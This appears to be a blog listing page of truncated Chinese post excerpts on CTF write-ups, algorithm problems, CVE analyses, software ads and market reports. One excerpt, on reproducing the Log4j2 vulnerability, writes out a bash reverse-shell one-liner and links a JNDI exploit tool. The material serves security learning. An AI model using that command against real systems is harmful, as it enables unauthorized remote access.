gkctf misc 2021

misc还是需要多做题来拓宽思路，不然很难做出来，除非题目非常套路。 # 古典密码 ## 种类 ### 置换：只是重新排列，字母本身不变，但是位置变了 ### 代换：把明文中的字符进行了替换 ## 凯撒密码 ### 有一个偏移量，每个字母按偏移量进行便宜 ### 注意：可能是左偏也可能是右偏，如果非 ......

Minitab是一款流行的统计分析和质量管理软件，被广泛应用于各个行业和领域。它提供了丰富的统计方法和工具，帮助用户进行数据分析、质量改进和决策制定。 点击获取Minitab 首先，Minitab具备强大的数据分析功能。它支持多种数据导入方式，用户可以从Excel、SQL数据库等来源导入数据进行分析 ......

## 前端代码编写规范及es6常用语法 1. 命名规范 ``` 文件夹名称，文件名称，组件名称，统一使用大驼峰或者 小横线方式命名； 组件文件名: list-item.vue.或者ListItem.vue; 基础的无状态的通用组件加V Base App前缀 BaseButton AppButton ......

df -lh 接下来的四个字段 Size、Used、Avail、及 Use% 分别是该分割区的容量、已使用的大小、剩下的大小、及使用的百分比 du命令：查询文件或文件夹的磁盘使用空间 如果当前目录下文件和文件夹很多 使用不带参数du的命令，可以循环列出所有文件和文件夹所使用的空间。这对查看究竟是那个 ......

[第五空间 2021]pklovecloud 题目来源：nssctf 题目类型：web 涉及考点：POP链 1. 先做代码审计 ```php cinder = new pkshow; } function __toString() { if (isset($this->cinder)) return ......

# 【kruskal重构树，倍增】2021 ICPC Asia Shanghai - H. Life is a Game 题目链接：[Problem - H - Codeforces 问题 - H - Codeforces](https://codeforces.com/gym/103446/pro ......

## 前言 - 众所周知，2021年是GDOI第一年有普及组，~~所以本蒟蒻才敢报~~ - 一场比赛也异常的贵，800元 - 不过可以去深圳游一游，还是挺期待的 ## Day-0 傍晚差不多5:30到**深圳耀华实验学校**，第一眼就爱上了这个学校，教学楼的实际风格十分现代化 去食堂吃晚饭,~~这不 ......

# 写在前面 一道普及级别的题目。CSP-J 全国统一命题 2021年第三题。 本题解来自于一位真正的大佬。传送门https://www.luogu.com.cn/blog/xyf007/solution-p7911。 题面信息来源于洛谷。请访问https://www.luogu.com.cn/pr ......

# [NOI2021] 路径交点 题解 ## 题意 给定一张 $k$ 层的有向图，第 $i$ 层有 $n_i$​ 个顶点，第 ​$1$ 层与第 $k$​ 层**顶点数相同**。对于第 ​ ​$j$ $(1 \leq j using namespace std; const int N = 205; ......

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的，接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得，从中收获到自己独特的见解。 ......

> 文章写于2021-11-29，首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......

# 题目源码 ```php admin 'w44m' && $this->passwd '08067'){ include('flag.php'); echo $flag; }else{ echo $this->admin; echo $this->passwd; echo 'nono'; } } ......

Minitab 2021 是一款功能强大的统计分析管理软件，广泛应用于质量管理、数据分析、实验设计和质量改进等领域。 点击获取Minitab 2021 数据导入和管理：Minitab 2021 提供了灵活的数据导入和管理功能，可以导入各种常见格式的数据文件，如文本文件、Excel 表格、数据库等。用 ......

AndroidStudio2021.3logcat工具无法显示日志解决办法 https://blog.csdn.net/weixin_43623271/article/details/127876964 1.File -> setting2.搜索logcat, ->ExperimentalunChk ......

俗话说：工欲善其事必先利其器！持证上岗，考取电工证是成为一名优秀电工的第一步。 近来，很多电工同行在后台询问小编有没有2021年电工考试试题及答案，故小编花了很大的精力整理出一份电工自测考题。本份试卷共80道题目，包含10道判断题、50道选择题和20道多选题，完全模拟电工证考试题型，附答案！ 这份电 ......

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......

参考链接：https://www.cnblogs.com/Hekeats-L/p/16964401.html 介绍 该房间对每个 OWASP 主题进行了详细分析，并包含有关漏洞、它们如何发生以及如何利用它们的详细信息。您将通过完成支持性挑战将理论付诸实践。 访问控制损坏 加密失败 注射 不安全的设计 ......

报告链接：http://tecdat.cn/?p=31424 人口出生红利消失，以及后疫情时代的冲击，但消费升级将负面因素拉平，母婴消费市场总量持续稳步上升。"精致妈妈"的营销价值日益凸显。阅读原文，获取专题报告合集全文，解锁文末56份母婴行业相关报告。 当母婴人群成为众多母婴及家庭消费品的重要入口 ......

kali：192.168.111.111 靶机：192.168.111.174 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174 ``` ![image](https://img2023.cnb ......

[鹤城杯 2021]EasyP 题目来源：nssctf 题目类型：web 涉及考点：正则绕过 1. 还是先做代码审计 ```php ``` 这题出现了挺多没见过的东西，还是先介绍一下： > $_SERVER[...]：是一个包含了诸如头信息（header）、路径（path）、以及脚本位置（scrip ......

报告链接：http://tecdat.cn/?p=31419 随着大量企业的涌入，服务机器人产业化即将到来。 阅读原文，获取专题报告合集全文，解锁文末40份服务机器人行业相关报告。 经过多年的发展，我国已经实现了完整的服务机器人产业生态系统。在常态化疫情防控、人口老龄化、技术进步和政策支持等多种因素 ......

一个显然的思路是：在排列 $p$ 的括号串合法的基础上，使得左括号在原括号串中尽量靠左，这样答案更有可能合法。于是我们求出这个原括号尽量靠左的括号串（下文称为“最优括号串”），然后 check 合法性即可。 下文中 $s$ 是排列 $p$ 的括号串。 当 $n=2$ 时，唯一的填法是令 $s_1\g ......

### [题目传送门](https://www.luogu.com.cn/problem/P8512) ## solution 简单题，考虑正着做扫描线，维护最后一次覆盖每个位置的修改时间，这个可以用 $set$ 维护颜色段数均摊。 那么显然对于一个以当前位置为右端点的询问，其答案就是所有最后修改时 ......

[题目链接](https://www.luogu.com.cn/problem/P9445) 数据有点水啊，貌似矩阵大小最大只有 $500$，这导致一堆 bitset 乱搞或者暴力啥的无聊解法能过，这里就不多说了，快进到正题。 二维通配符匹配。 首先根据 Rabin Karp 给每种颜色随机一个权值 ......

## 前言 这个人是蒟蒻，初二，在机房属于是垫底。今年是第一次参加 CSP-S，第二次参加 CSP-J。 ## Day -1 颓。 ## Day 0 学校搞运动会，上午一边看运动会，一边复（摸）习（鱼）。 中午 $1:00$ 出发，在车上又看了会儿算法。全车的人都在颓。 回了酒店后继续颓，感觉明天要 ......

[SWPUCTF 2021 新生赛]ez_unserialize 题目来源：nssctf 题目类型：web 涉及考点：PHP反序列化 1. 检查一下源代码，发现Disallow： 猜测大概有`robots.txt`，扫下后台看看： 额，flag.php都扫出来了，但是进不去，还是老老实实看robot ......

卡死人了。 数据随机写在上面，就是让你预估一下区间长度不会太长的，数据里最长的不超过 $2000$。 暴力扫 $2000$ 个显然过不了 $500000$ 的点，但是 $500000$ 的点 $m$ 为 $1$ 且必定询问整个序列。可以分析出，在随机情况下，前缀和最小最大数量是根号个的，平方后是四次 ......

package PTACZW; import java.util.Scanner; import java.util.ArrayList; import java.io.*; import java.util.StringTokenizer; public class Main{ static Bu ......

# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述： OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他 网络级 ......

一、题目链接 https://adworld.xctf.org.cn/challenges/list 二、解法步骤 打开附件是一个非常狭窄的gif动图，看来想用stegslove暂停来取是不可能的了。这里我们可以用gif分解网站：https://tu.sioe.cn/gj/fenjie/。 将文件上 ......